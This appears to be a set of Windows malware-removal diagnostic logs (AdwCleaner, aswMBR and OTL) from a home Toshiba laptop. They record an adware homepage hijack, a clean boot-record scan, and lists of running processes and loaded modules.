[C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\preferences] - Found [Homepage] : hxxp://astromenda.com/?f=1&a=ast_ir_14_45_ff&cd=2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDtDyCtCzzzytAyC0F0DtN0D0Tzu0StCtDyEtBtN1L2XzutAtFyCtFtCtFtDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2StB0C0DyD0AyEyByCtG0CtCyDzytGzyyC0AzztGzy0A0EyEtGtC0Ezy0ByBzyzy0C0EzyyEtA2QtN1M1F1B2Z1V1N2Y1L1Qzu2Szy0E0FtB0AtAtC0DtG0B0C0A0EtGyEzz0C0DtG0Azz0DtDtGyB0BtDtDzytD0CyC0EyE0C0D2Q&cr=582993201&ir=
[C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\preferences] - Found [Startup_URLs] : hxxp://astromenda.com/?f=7&a=ast_ir_14_45_ff&cd=2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDtDyCtCzzzytAyC0F0DtN0D0Tzu0StCtDyEtBtN1L2XzutAtFyCtFtCtFtDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2StB0C0DyD0AyEyByCtG0CtCyDzytGzyyC0AzztGzy0A0EyEtGtC0Ezy0ByBzyzy0C0EzyyEtA2QtN1M1F1B2Z1V1N2Y1L1Qzu2Szy0E0FtB0AtAtC0DtG0B0C0A0EtGyEzz0C0DtG0Azz0DtDtGyB0BtDtDzytD0CyC0EyE0C0D2Q&cr=582993201&ir=
 
*************************
 
AdwCleaner[R0].txt - [8518 octets] - [10/11/2014 10:26:01]
 
########## EOF - C:\AdwCleaner\AdwCleaner[R0].txt - [8578 octets] ##########
 
 
aswMBR version 1.0.1.2201 Copyright© 2014 AVAST Software
Run date: 2014-11-10 10:32:14
-----------------------------
10:32:14.962    OS Version: Windows 6.1.7600 
10:32:14.962    Number of processors: 1 586 0x301
10:32:14.962    ComputerName: MOM-PC  UserName: Mom
10:33:06.474    Initialize success
10:33:07.004    VM: initialized successfully
10:33:07.004    VM: Amd CPU virtualization not supported 
10:34:10.773    Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP1T0L0-1
10:34:10.773    Disk 0 Vendor: TOSHIBA_MK2555GSXN GC002M Size: 238475MB BusType: 11
10:34:10.945    Disk 0 MBR read successfully
10:34:10.945    Disk 0 MBR scan
10:34:10.960    Disk 0 Windows VISTA default MBR code
10:34:10.976    Disk 0 Partition 1 80 (A) 27 Hidden NTFS WinRE NTFS         1500 MB offset 2048
10:34:10.976    Disk 0 default boot code
10:34:11.007    Disk 0 Partition 2 00     07    HPFS/NTFS NTFS       228693 MB offset 3074048
10:34:11.054    Disk 0 Partition 3 00     17 Hidd HPFS/NTFS NTFS         8281 MB offset 471437312
10:34:11.101    Disk 0 scanning sectors +488396800
10:34:11.257    Disk 0 scanning C:\windows\system32\drivers
10:34:18.698    Service scanning
10:34:34.111    Service kl1 C:\windows\system32\DRIVERS\kl1.sys **LOCKED** 5
10:34:34.267    Service klflt C:\windows\system32\DRIVERS\klflt.sys **LOCKED** 5
10:34:34.407    Service klhk C:\windows\system32\DRIVERS\klhk.sys **LOCKED** 5
10:34:34.672    Service KLIM6 C:\windows\system32\DRIVERS\klim6.sys **LOCKED** 5
10:34:34.797    Service klkbdflt C:\windows\system32\DRIVERS\klkbdflt.sys **LOCKED** 5
10:34:34.922    Service klmouflt C:\windows\system32\DRIVERS\klmouflt.sys **LOCKED** 5
10:34:35.047    Service klpd C:\windows\system32\DRIVERS\klpd.sys **LOCKED** 5
10:34:35.171    Service kltdi C:\windows\system32\DRIVERS\kltdi.sys **LOCKED** 5
10:34:35.312    Service kneps C:\windows\system32\DRIVERS\kneps.sys **LOCKED** 5
10:35:02.362    Modules scanning
10:35:28.664    Disk 0 trace - called modules:
10:35:28.695    ntkrnlpa.exe CLASSPNP.SYS disk.sys ataport.SYS halmacpi.dll PCIIDEX.SYS msahci.sys 
10:35:28.695    1 nt!IofCallDriver -> \Device\Harddisk0\DR0[0x8646f4d8]
10:35:28.711    3 CLASSPNP.SYS[891a859e] -> nt!IofCallDriver -> \Device\Ide\IdeDeviceP1T0L0-1[0x86465030]
10:35:28.726    Disk 0 statistics 212585/0/0 @ 4.01 MB/s
10:35:28.726    Scan finished successfully
10:36:28.599    Disk 0 MBR has been saved successfully to "C:\Users\Mom\Desktop\MBR.dat"
10:36:28.615    The log file has been saved successfully to "C:\Users\Mom\Desktop\mbrfix.txt"
 
 
 
OTL logfile created on: 11/9/2014 9:23:59 PM - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\Mom\Desktop
 Home Premium Edition  (Version = 6.1.7600) - Type = NTWorkstation
Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
1.75 Gb Total Physical Memory | 0.76 Gb Available Physical Memory | 43.25% Memory free
3.50 Gb Paging File | 1.89 Gb Available in Paging File | 54.07% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\windows | %ProgramFiles% = C:\Program Files
Drive C: | 223.33 Gb Total Space | 165.42 Gb Free Space | 74.07% Space Free | Partition Type: NTFS
 
Computer Name: MOM-PC | User Name: Mom | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Quick Scan
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - [2014/11/09 21:23:12 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Mom\Desktop\OTL.exe
PRC - [2014/10/21 20:05:02 | 000,854,344 | ---- | M] (Google Inc.) -- C:\Program Files\Google\Chrome\Application\chrome.exe
PRC - [2014/09/12 01:43:06 | 000,064,704 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe
PRC - [2014/08/22 11:44:44 | 000,022,192 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft Security Client\MsMpEng.exe
PRC - [2014/08/22 11:41:00 | 000,974,432 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Microsoft Security Client\msseces.exe
PRC - [2014/04/20 16:15:58 | 000,233,552 | ---- | M] (Kaspersky Lab ZAO) -- C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\avp.exe
PRC - [2014/04/20 16:15:18 | 000,192,160 | ---- | M] (Kaspersky Lab ZAO) -- C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\avpui.exe
PRC - [2014/04/20 01:41:10 | 000,478,912 | ---- | M] (Kaspersky Lab ZAO) -- C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\klwtbws.exe
PRC - [2013/06/25 20:48:08 | 000,228,552 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Microsoft Office\Office14\ONENOTEM.EXE
PRC - [2011/02/25 21:33:07 | 002,614,784 | ---- | M] (Microsoft Corporation) -- C:\Windows\explorer.exe
PRC - [2011/02/11 12:45:54 | 001,295,736 | ---- | M] (TOSHIBA Corporation) -- C:\Program Files\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe
PRC - [2011/02/11 12:45:52 | 000,054,136 | ---- | M] (TOSHIBA Corporation) -- C:\Program Files\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe
PRC - [2009/09/17 14:37:18 | 000,111,960 | ---- | M] (TOSHIBA Corporation) -- C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe
PRC - [2009/09/17 14:36:58 | 001,021,272 | ---- | M] (TOSHIBA Corporation) -- C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSENotify.exe
PRC - [2009/08/10 18:55:46 | 000,185,712 | ---- | M] (TOSHIBA CORPORATION) -- C:\Program Files\TOSHIBA\ConfigFree\CFIWmxSvcs.exe
PRC - [2009/08/05 13:18:50 | 000,464,224 | ---- | M] (TOSHIBA Corporation) -- C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe
PRC - [2009/08/05 13:18:08 | 000,476,512 | ---- | M] (TOSHIBA Corporation) -- C:\Program Files\TOSHIBA\Power Saver\TPwrMain.exe
PRC - [2009/08/05 13:04:54 | 000,738,616 | ---- | M] (TOSHIBA Corporation) -- C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe
PRC - [2009/07/29 22:54:38 | 000,348,160 | ---- | M] (AMD) -- C:\Windows\System32\atieclxx.exe
PRC - [2009/07/29 22:54:10 | 000,176,128 | ---- | M] (AMD) -- C:\Windows\System32\atiesrxx.exe
PRC - [2009/07/28 19:26:42 | 000,062,848 | ---- | M] (TOSHIBA CORPORATION) -- C:\Program Files\TOSHIBA\ConfigFree\CFSwMgr.exe
PRC - [2009/07/28 14:43:04 | 000,128,344 | ---- | M] (TOSHIBA Corporation) -- C:\Windows\System32\TODDSrv.exe
PRC - [2009/07/28 13:00:10 | 000,460,088 | ---- | M] (TOSHIBA Corporation) -- C:\Program Files\TOSHIBA\SmoothView\SmoothView.exe
PRC - [2009/07/13 17:14:42 | 000,049,152 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\taskhost.exe
PRC - [2009/07/13 14:24:00 | 000,304,496 | ---- | M] (TOSHIBA CORPORATION) -- C:\Program Files\TOSHIBA\ConfigFree\NDSTray.exe
PRC - [2009/03/10 17:51:20 | 000,046,448 | ---- | M] (TOSHIBA CORPORATION) -- C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe
PRC - [2009/01/13 20:33:40 | 000,034,088 | ---- | M] (TOSHIBA CORPORATION) -- C:\Program Files\TOSHIBA\Utilities\KeNotify.exe
 
 
========== Modules (No Company Name) ==========
 
MOD - [2014/10/21 20:04:57 | 008,910,664 | ---- | M] () -- C:\Program Files\Google\Chrome\Application\38.0.2125.111\pdf.dll
MOD - [2014/10/21 20:04:51 | 001,042,760 | ---- | M] () -- C:\Program Files\Google\Chrome\Application\38.0.2125.111\libglesv2.dll
MOD - [2014/10/21 20:04:49 | 000,211,272 | ---- | M] () -- C:\Program Files\Google\Chrome\Application\38.0.2125.111\libegl.dll
MOD - [2014/10/21 20:04:48 | 001,681,224 | ---- | M] () -- C:\Program Files\Google\Chrome\Application\38.0.2125.111\ffmpegsumo.dll
MOD - [2013/02/13 19:39:16 | 000,212,992 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.ServiceProce#\bfceac53dda4bf7ba2f5020573f80163\System.ServiceProcess.ni.dll
MOD - [2013/02/13 19:38:56 | 011,824,128 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Web\a00aab40bdf5aed84b4d4294965cf20d\System.Web.ni.dll
MOD - [2013/02/13 19:36:02 | 012,433,920 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\05682429807d34d6ff05a77ea153935f\System.Windows.Forms.ni.dll
MOD - [2013/01/10 21:53:49 | 000,771,584 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\01b47a246b4ec7bfec31bf4503aceda1\System.Runtime.Remoting.ni.dll
MOD - [2013/01/10 21:52:15 | 001,592,832 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\e2ee5d77ebe0bd025e7a7a317a43d677\System.Drawing.ni.dll
MOD - [2013/01/10 21:51:28 | 005,453,312 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Xml\10aba2c167cc1119b80159fd9ac71ca8\System.Xml.ni.dll
MOD - [2013/01/10 21:51:22 | 000,971,264 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\96a3b737db1e72adaf32d2b350e50c23\System.Configuration.ni.dll
MOD - [2013/01/10 21:51:20 | 007,974,400 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System\c54750e64ba10d0fb7b6a636fb3695ca\System.ni.dll
MOD - [2013/01/10 21:51:12 | 011,490,816 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\mscorlib\b0b8554c05f194f546a8ed531320760b\mscorlib.ni.dll
MOD - [2012/06/13 21:40:20 | 008,007,680 | ---- | M] () -- C:\windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll
MOD - [2010/07/07 22:26:16 | 001,736,704 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DisplaysManager.Graphics.Wizard\2.0.3497.38831__90ba9c70f846762e\CLI.Aspect.DisplaysManager.Graphics.Wizard.dll
MOD - [2010/07/07 22:26:16 | 000,339,968 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Caste.Graphics.Runtime\2.0.3497.38814__90ba9c70f846762e\CLI.Caste.Graphics.Runtime.dll
MOD - [2010/07/07 22:26:16 | 000,204,800 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.InfoCentre.Graphics.Wizard\2.0.3497.38833__90ba9c70f846762e\CLI.Aspect.InfoCentre.Graphics.Wizard.dll
MOD - [2010/07/07 22:26:16 | 000,077,824 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DeviceTV.Graphics.Runtime\2.0.3497.38880__90ba9c70f846762e\CLI.Aspect.DeviceTV.Graphics.Runtime.dll
MOD - [2010/07/07 22:26:16 | 000,040,960 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Caste.Graphics.Wizard\2.0.3497.38828__90ba9c70f846762e\CLI.Caste.Graphics.Wizard.dll
MOD - [2010/07/07 22:26:16 | 000,036,864 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DeviceProperty.Graphics.Runtime\2.0.3497.38855__90ba9c70f846762e\CLI.Aspect.DeviceProperty.Graphics.Runtime.dll
MOD - [2010/07/07 22:26:16 | 000,020,480 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.HotkeysHandling.Graphics.Runtime\2.0.3497.38823__90ba9c70f846762e\CLI.Aspect.HotkeysHandling.Graphics.Runtime.dll
MOD - [2010/07/07 22:26:15 | 000,491,520 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.TransCode.Graphics.Wizard\2.0.3497.38899__90ba9c70f846762e\CLI.Aspect.TransCode.Graphics.Wizard.dll
MOD - [2010/07/07 22:26:15 | 000,331,776 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.Radeon3D.Graphics.Dashboard\2.0.3497.38868__90ba9c70f846762e\CLI.Aspect.Radeon3D.Graphics.Dashboard.dll
MOD - [2010/07/07 22:26:15 | 000,094,208 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.Radeon3D.Graphics.Wizard\2.0.3497.38868__90ba9c70f846762e\CLI.Aspect.Radeon3D.Graphics.Wizard.dll
MOD - [2010/07/07 22:26:15 | 000,073,728 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Caste.Graphics.Dashboard\2.0.3497.38822__90ba9c70f846762e\CLI.Caste.Graphics.Dashboard.dll
MOD - [2010/07/07 22:26:15 | 000,065,536 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DeviceCV.Graphics.Runtime\2.0.3497.38863__90ba9c70f846762e\CLI.Aspect.DeviceCV.Graphics.Runtime.dll
MOD - [2010/07/07 22:26:15 | 000,061,440 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.Radeon3D.Graphics.Runtime\2.0.3497.38867__90ba9c70f846762e\CLI.Aspect.Radeon3D.Graphics.Runtime.dll
MOD - [2010/07/07 22:26:15 | 000,045,056 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.Welcome.Graphics.Dashboard\2.0.3497.38899__90ba9c70f846762e\CLI.Aspect.Welcome.Graphics.Dashboard.dll
MOD - [2010/07/07 22:26:14 | 000,118,784 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.PowerPlayDPPE.Graphics.Dashboard\2.0.3497.38898__90ba9c70f846762e\CLI.Aspect.PowerPlayDPPE.Graphics.Dashboard.dll
MOD - [2010/07/07 22:26:14 | 000,045,056 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.PowerPlayDPPE.Graphics.Runtime\2.0.3497.38898__90ba9c70f846762e\CLI.Aspect.PowerPlayDPPE.Graphics.Runtime.dll
MOD - [2010/07/07 22:26:13 | 000,950,272 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DisplaysManager2.Graphics.Dashboard\2.0.3497.38923__90ba9c70f846762e\CLI.Aspect.DisplaysManager2.Graphics.Dashboard.dll
MOD - [2010/07/07 22:26:13 | 000,782,336 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.MMVideo.Graphics.Dashboard\2.0.3497.38856__90ba9c70f846762e\CLI.Aspect.MMVideo.Graphics.Dashboard.dll
MOD - [2010/07/07 22:26:13 | 000,573,440 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DisplaysColour2.Graphics.Dashboard\2.0.3497.38833__90ba9c70f846762e\CLI.Aspect.DisplaysColour2.Graphics.Dashboard.dll
MOD - [2010/07/07 22:26:13 | 000,409,600 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.MMVideo.Graphics.Wizard\2.0.3497.38875__90ba9c70f846762e\CLI.Aspect.MMVideo.Graphics.Wizard.dll
MOD - [2010/07/07 22:26:13 | 000,315,392 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DeviceLCD.Graphics.Dashboard\2.0.3497.38862__90ba9c70f846762e\CLI.Aspect.DeviceLCD.Graphics.Dashboard.dll
MOD - [2010/07/07 22:26:13 | 000,307,200 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DeviceLCD.Graphics.Wizard\2.0.3497.38837__90ba9c70f846762e\CLI.Aspect.DeviceLCD.Graphics.Wizard.dll
MOD - [2010/07/07 22:26:13 | 000,196,608 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.InfoCentre.Graphics.Dashboard\2.0.3497.38833__90ba9c70f846762e\CLI.Aspect.InfoCentre.Graphics.Dashboard.dll
MOD - [2010/07/07 22:26:13 | 000,094,208 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DisplaysOptions.Graphics.Dashboard\2.0.3497.38861__90ba9c70f846762e\CLI.Aspect.DisplaysOptions.Graphics.Dashboard.dll
MOD - [2010/07/07 22:26:13 | 000,081,920 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.MMVideo.Graphics.Runtime\2.0.3497.38856__90ba9c70f846762e\CLI.Aspect.MMVideo.Graphics.Runtime.dll
MOD - [2010/07/07 22:26:13 | 000,061,440 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DeviceDFP.Graphics.Runtime\2.0.3497.38855__90ba9c70f846762e\CLI.Aspect.DeviceDFP.Graphics.Runtime.dll
MOD - [2010/07/07 22:26:13 | 000,040,960 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DisplaysColour2.Graphics.Runtime\2.0.3497.38837__90ba9c70f846762e\CLI.Aspect.DisplaysColour2.Graphics.Runtime.dll
MOD - [2010/07/07 22:26:13 | 000,036,864 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DisplaysOptions.Graphics.Runtime\2.0.3497.38860__90ba9c70f846762e\CLI.Aspect.DisplaysOptions.Graphics.Runtime.dll
MOD - [2010/07/07 22:26:13 | 000,032,768 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DeviceLCD.Graphics.Runtime\2.0.3497.38862__90ba9c70f846762e\CLI.Aspect.DeviceLCD.Graphics.Runtime.dll
MOD - [2010/07/07 22:26:12 | 000,393,216 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DeviceCRT.Graphics.Dashboard\2.0.3497.38855__90ba9c70f846762e\CLI.Aspect.DeviceCRT.Graphics.Dashboard.dll
MOD - [2010/07/07 22:26:12 | 000,270,336 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.CrossDisplay.Graphics.Dashboard\1.0.0.0__90ba9c70f846762e\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
MOD - [2010/07/07 22:26:12 | 000,040,960 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DeviceCRT.Graphics.Runtime\2.0.3497.38856__90ba9c70f846762e\CLI.Aspect.DeviceCRT.Graphics.Runtime.dll
MOD - [2010/07/07 22:26:12 | 000,020,480 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\AEM.Plugin.Hotkeys.Shared\2.0.3428.28304__90ba9c70f846762e\AEM.Plugin.Hotkeys.Shared.dll
MOD - [2010/07/07 22:26:12 | 000,020,480 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\AEM.Actions.CCAA.Shared\2.0.3428.28302__90ba9c70f846762e\AEM.Actions.CCAA.Shared.dll
MOD - [2010/07/07 22:26:12 | 000,016,384 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\AEM.Plugin.WinMessages.Shared\2.0.3428.28311__90ba9c70f846762e\AEM.Plugin.WinMessages.Shared.dll
MOD - [2010/07/07 22:26:12 | 000,016,384 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\AEM.Plugin.REG.Shared\2.0.3428.28329__90ba9c70f846762e\AEM.Plugin.REG.Shared.dll
MOD - [2010/07/07 22:26:12 | 000,016,384 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\AEM.Plugin.GD.Shared\2.0.3428.28327__90ba9c70f846762e\AEM.Plugin.GD.Shared.dll
MOD - [2010/07/07 22:26:12 | 000,016,384 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\AEM.Plugin.EEU.Shared\2.0.3428.28311__90ba9c70f846762e\AEM.Plugin.EEU.Shared.dll
MOD - [2010/07/07 22:26:12 | 000,016,384 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\AEM.Plugin.DPPE.Shared\2.0.3428.28327__90ba9c70f846762e\AEM.Plugin.DPPE.Shared.dll
MOD - [2010/07/07 22:26:12 | 000,007,168 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\atixclib\1.0.0.0__90ba9c70f846762e\atixclib.dll
MOD - [2010/07/07 22:26:11 | 000,045,056 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\DEM.Graphics.I0601\2.0.2573.17685__90ba9c70f846762e\DEM.Graphics.I0601.dll
MOD - [2010/07/07 22:26:11 | 000,032,768 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\LOG.Foundation\2.0.3428.28296__90ba9c70f846762e\LOG.Foundation.dll
MOD - [2010/07/07 22:26:11 | 000,028,672 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\NEWAEM.Foundation\2.0.3428.28297__90ba9c70f846762e\NEWAEM.Foundation.dll
MOD - [2010/07/07 22:26:11 | 000,028,672 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Foundation.XManifest\2.0.3428.28354__90ba9c70f846762e\CLI.Foundation.XManifest.dll
MOD - [2010/07/07 22:26:11 | 000,016,384 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\MOM.Foundation\2.0.3428.28310__90ba9c70f846762e\MOM.Foundation.dll
MOD - [2010/07/07 22:26:11 | 000,016,384 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\DEM.Graphics.I0706\2.0.2743.23304__90ba9c70f846762e\DEM.Graphics.I0706.dll
MOD - [2010/07/07 22:26:11 | 000,016,384 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\DEM.Graphics\2.0.3428.28324__90ba9c70f846762e\DEM.Graphics.dll
MOD - [2010/07/07 22:26:11 | 000,016,384 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\DEM.Foundation\2.0.2573.17684__90ba9c70f846762e\DEM.Foundation.dll
MOD - [2010/07/07 22:26:10 | 000,098,304 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Caste.Graphics.Shared\2.0.3428.28305__90ba9c70f846762e\CLI.Caste.Graphics.Shared.dll
MOD - [2010/07/07 22:26:10 | 000,094,208 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Foundation\2.0.3428.28298__90ba9c70f846762e\CLI.Foundation.dll
MOD - [2010/07/07 22:26:10 | 000,053,248 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.Radeon3D.Graphics.Shared\2.0.3428.28315__90ba9c70f846762e\CLI.Aspect.Radeon3D.Graphics.Shared.dll
MOD - [2010/07/07 22:26:10 | 000,040,960 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.TransCode.Graphics.Shared\2.0.3428.28324__90ba9c70f846762e\CLI.Aspect.TransCode.Graphics.Shared.dll
MOD - [2010/07/07 22:26:10 | 000,028,672 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.PowerPlayDPPE.Graphics.Shared\2.0.3428.28323__90ba9c70f846762e\CLI.Aspect.PowerPlayDPPE.Graphics.Shared.dll
MOD - [2010/07/07 22:26:10 | 000,024,576 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Component.Dashboard.Shared\2.0.3428.28304__90ba9c70f846762e\CLI.Component.Dashboard.Shared.dll
MOD - [2010/07/07 22:26:10 | 000,020,480 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Component.Wizard.Shared\2.0.3428.28308__90ba9c70f846762e\CLI.Component.Wizard.Shared.dll
MOD - [2010/07/07 22:26:10 | 000,020,480 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Component.Client.Shared\2.0.3428.28302__90ba9c70f846762e\CLI.Component.Client.Shared.dll
MOD - [2010/07/07 22:26:10 | 000,016,384 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Component.Runtime.Shared\2.0.3428.28303__90ba9c70f846762e\CLI.Component.Runtime.Shared.dll
MOD - [2010/07/07 22:26:10 | 000,016,384 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Caste.Graphics.Wizard.Shared\2.0.3428.28313__90ba9c70f846762e\CLI.Caste.Graphics.Wizard.Shared.dll
MOD - [2010/07/07 22:26:10 | 000,016,384 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Caste.Graphics.Dashboard.Shared\2.0.3428.28312__90ba9c70f846762e\CLI.Caste.Graphics.Dashboard.Shared.dll
MOD - [2010/07/07 22:26:09 | 000,065,536 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DeviceTV.Graphics.Shared\2.0.3428.28316__90ba9c70f846762e\CLI.Aspect.DeviceTV.Graphics.Shared.dll
MOD - [2010/07/07 22:26:09 | 000,053,248 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.MMVideo.Graphics.Shared\2.0.3428.28314__90ba9c70f846762e\CLI.Aspect.MMVideo.Graphics.Shared.dll
MOD - [2010/07/07 22:26:09 | 000,053,248 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DeviceCRT.Graphics.Shared\2.0.3428.28314__90ba9c70f846762e\CLI.Aspect.DeviceCRT.Graphics.Shared.dll
MOD - [2010/07/07 22:26:09 | 000,049,152 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DeviceDFP.Graphics.Shared\2.0.3428.28314__90ba9c70f846762e\CLI.Aspect.DeviceDFP.Graphics.Shared.dll
MOD - [2010/07/07 22:26:09 | 000,040,960 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DeviceCV.Graphics.Shared\2.0.3428.28315__90ba9c70f846762e\CLI.Aspect.DeviceCV.Graphics.Shared.dll
MOD - [2010/07/07 22:26:09 | 000,032,768 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DeviceProperty.Graphics.Shared\2.0.3428.28309__90ba9c70f846762e\CLI.Aspect.DeviceProperty.Graphics.Shared.dll
MOD - [2010/07/07 22:26:09 | 000,028,672 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DisplaysColour2.Graphics.Shared\2.0.3428.28313__90ba9c70f846762e\CLI.Aspect.DisplaysColour2.Graphics.Shared.dll
MOD - [2010/07/07 22:26:09 | 000,028,672 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DeviceLCD.Graphics.Shared\2.0.3428.28312__90ba9c70f846762e\CLI.Aspect.DeviceLCD.Graphics.Shared.dll
MOD - [2010/07/07 22:26:09 | 000,028,672 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.CustomFormats.Graphics.Shared\2.0.3428.28311__90ba9c70f846762e\CLI.Aspect.CustomFormats.Graphics.Shared.dll
MOD - [2010/07/07 22:26:09 | 000,024,576 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DisplaysOptions.Graphics.Shared\2.0.3428.28314__90ba9c70f846762e\CLI.Aspect.DisplaysOptions.Graphics.Shared.dll
MOD - [2010/07/07 22:26:09 | 000,020,480 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.HotkeysHandling.Graphics.Shared\2.0.3428.28312__90ba9c70f846762e\CLI.Aspect.HotkeysHandling.Graphics.Shared.dll
